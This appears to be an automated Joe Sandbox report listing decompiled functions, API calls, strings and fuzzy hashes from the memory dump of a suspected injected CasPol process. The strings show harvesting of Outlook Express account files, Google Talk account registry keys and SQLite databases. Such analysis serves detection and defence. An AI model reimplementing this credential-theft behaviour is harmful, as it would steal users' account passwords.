                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                    • API String ID: 1640410171-3316789007
                                                                                                                                                                                                                    • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                                                    • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                                                      • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                    • String ID: ACD
                                                                                                                                                                                                                    • API String ID: 1886237854-620537770
                                                                                                                                                                                                                    • Opcode ID: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                                                                                                                                                                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2054149589-0
                                                                                                                                                                                                                    • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                    • API String ID: 1366857005-1079885057
                                                                                                                                                                                                                    • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                                                      • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                    • API String ID: 3929982141-2036018995
                                                                                                                                                                                                                    • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                                                    • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                                                    • API String ID: 882979914-1578091866
                                                                                                                                                                                                                    • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                      • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                      • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3143880245-0
                                                                                                                                                                                                                    • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                                                    • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1033339047-0
                                                                                                                                                                                                                    • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                    • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402A34
                                                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                                                                                                    • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$Enummemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1615280680-0
                                                                                                                                                                                                                    • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                                                    • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                                    • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3056473165-0
                                                                                                                                                                                                                    • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                                                    • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                    • String ID: sqlite3.dll
                                                                                                                                                                                                                    • API String ID: 3677997916-1155512374
                                                                                                                                                                                                                    • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                                                    • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID: eBD
                                                                                                                                                                                                                    • API String ID: 823142352-44267735
                                                                                                                                                                                                                    • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                                                    • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                                                    • API String ID: 520177685-3817206916
                                                                                                                                                                                                                    • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                                                      • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1880195650-0
                                                                                                                                                                                                                    • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                                                    • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1208763047-0
                                                                                                                                                                                                                    • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                                                    • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
